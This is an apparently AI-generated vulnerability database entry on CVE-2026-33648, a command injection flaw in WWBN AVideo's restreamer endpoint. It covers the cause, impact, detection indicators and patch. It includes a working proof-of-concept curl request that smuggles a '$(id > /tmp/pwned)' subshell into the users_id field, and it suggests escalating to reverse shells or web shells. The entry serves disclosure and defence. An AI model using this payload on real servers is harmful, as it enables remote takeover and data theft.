
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33648 is an OS command injection vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw resides in the restreamer endpoint (plugin/Live/standAloneFiles/restreamer.json.php), where user-controlled users_id and liveTransmitionHistory_id values from JSON request bodies are embedded unsanitized into shell commands executed via PHP's exec(). It was published on March 22–23, 2026, with a patch committed the same day. The vulnerability carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, AVideo Advisory).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The vulnerable file plugin/Live/standAloneFiles/restreamer.json.php reads JSON input via file_get_contents("php://input") and directly interpolates $robj->users_id and $robj->liveTransmitionHistory_id into a log file path template (e.g., ffmpeg_restreamer_{users_id}_<date>.log). This path is then concatenated into shell commands at lines 720 and 723 and passed to exec() or execFFMPEGAsyncOrRemote() without using escapeshellarg(). An attacker can inject shell metacharacters such as $() or backticks (e.g., users_id: "x$(id > /tmp/pwned)x") to achieve subshell execution. Notably, the code applies clearCommandURL() and escapeshellarg() to stream URLs and pgrep patterns elsewhere, but the log file path was overlooked (AVideo Advisory, Patch Commit).
Successful exploitation allows an authenticated attacker to execute arbitrary OS commands on the server with the privileges of the web server process. This enables full server compromise including reading sensitive files (/etc/passwd, database credentials, .env files), exfiltrating all AVideo user data, installing persistent backdoors (web shells, cron jobs), disrupting service by killing processes or deleting files, and using the compromised host as a pivot point for lateral movement. Because many AVideo deployments allow open user registration, the low-privilege authentication requirement is often a minimal barrier in practice (AVideo Advisory).
A proof-of-concept exploit with specific curl commands targeting the vulnerable endpoint is publicly available in the GitHub security advisory, rated high confidence (AVideo Advisory). As of the time of reporting, there is no evidence of active in-the-wild exploitation or known threat actor attribution. The EPSS score is approximately 0.091% (26th percentile), indicating a currently low but non-negligible probability of exploitation within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory).
/plugin/Live/standAloneFiles/restreamer.json.php with shell metacharacters injected into users_id:curl -k -X POST "https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php" \
-H "Content-Type: application/json" \
-d '{
"token": "VALID_TOKEN",
"m3u8": "https://example.com/stream.m3u8",
"restreamsDestinations": ["rtmp://example.com/live/key"],
"restreamsToken": ["VALID_TOKEN"],
"users_id": "x$(id > /tmp/pwned)x",
"liveTransmitionHistory_id": "1"
}'ffmpeg_restreamer_x$(id > /tmp/pwned)x_<date>.log and passes it to exec(). The $() subshell executes id > /tmp/pwned before the shell processes the redirection.curl -k "https://TARGET/tmp/pwned" — the response should contain the web server user's identity (e.g., uid=33(www-data)).id payload with more impactful commands (e.g., downloading a reverse shell, adding SSH keys, or installing a web shell) to establish persistent access (AVideo Advisory)./plugin/Live/standAloneFiles/restreamer.json.php containing shell metacharacters ($(), backticks, ;, |) in the users_id or liveTransmitionHistory_id JSON fields; outbound connections from the web server process to unknown external IPs./tmp/ (e.g., pwned, pwned2) containing command output; new or modified web shells in the AVideo web root; new cron jobs or SSH authorized_keys entries created by the web server user.restreamer.json.php with encoded or unusual characters in the request body; PHP error logs referencing exec() failures or unexpected command strings; ffmpeg log files with anomalous names containing shell metacharacters./bin/sh, curl, wget, python, nc) visible via ps aux or process monitoring tools (AVideo Advisory).Apply the patch introduced in commit 99b865413172045fef6a98b5e9bfc7b24da11678, which adds a sanitizeLogFileComponent() function that strips non-alphanumeric characters from users_id and liveTransmitionHistory_id, and wraps the log file path with escapeshellarg() before passing it to exec() (Patch Commit). As a workaround prior to patching, restrict access to the restreamer endpoint to trusted IP ranges via web server configuration, and disable open user registration to limit the attacker pool. Additionally, deploying a Web Application Firewall (WAF) rule to detect and block shell metacharacters ($(), backticks, ;, |) in JSON request bodies targeting this endpoint provides an additional layer of defense (AVideo Advisory).
The Hacker Wire published a write-up on the vulnerability titled "WWBN AVideo RCE via Authenticated Command Injection" shortly after disclosure (The Hacker Wire). The advisory was also shared on Mastodon by The Hacker Wire, generating community awareness. No major vendor statements beyond the original GitHub advisory from the AVideo maintainer (DanielnetoDotCom) have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."